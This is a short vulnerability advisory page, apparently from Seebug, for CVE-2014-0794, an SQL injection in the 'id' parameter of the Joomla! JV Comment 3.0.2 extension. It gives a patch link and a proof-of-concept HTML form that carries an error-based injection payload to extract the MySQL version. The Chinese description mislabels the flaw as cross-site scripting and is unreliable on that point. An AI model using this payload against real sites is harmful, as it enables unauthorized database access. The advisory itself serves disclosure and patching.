Joomla! JV Comment扩展'id'参数SQL注入漏洞

2014-02-1000:00:00

Root

www.seebug.org

0.006 Low

EPSS

Percentile

76.3%

JSON

BUGTRAQ ID: 64661
CVE(CAN) ID: CVE-2014-0794

JV Comment是Joomla!的一个扩展，可以将评论系统添加到文章内。

JV Comment for Joomla!(版本3.0.2)，文件com_jvcomment在实现上存在跨站脚本漏洞，这可使远程攻击者在comment.like操作的id参数，利用此漏洞注入任意Web脚本或HTML，从而查看、添加、修改、删除后端数据库内的信息。
0
Joomla! JV Comment 3.0.2
厂商补丁：

Joomla!

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.joomlavi.com/joomla-extensions/jv-comment.html


                                                The following exploitation example displays version of MySQL database:


&lt;form action=&quot;http://[host]/index.php&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;option&quot; value=&quot;com_jvcomment&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;task&quot;   value=&quot;comment.like&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;id&quot;     value=&quot;1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))&quot;&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;

0.006 Low

EPSS

Percentile

76.3%

JSON

Related for SSV:61397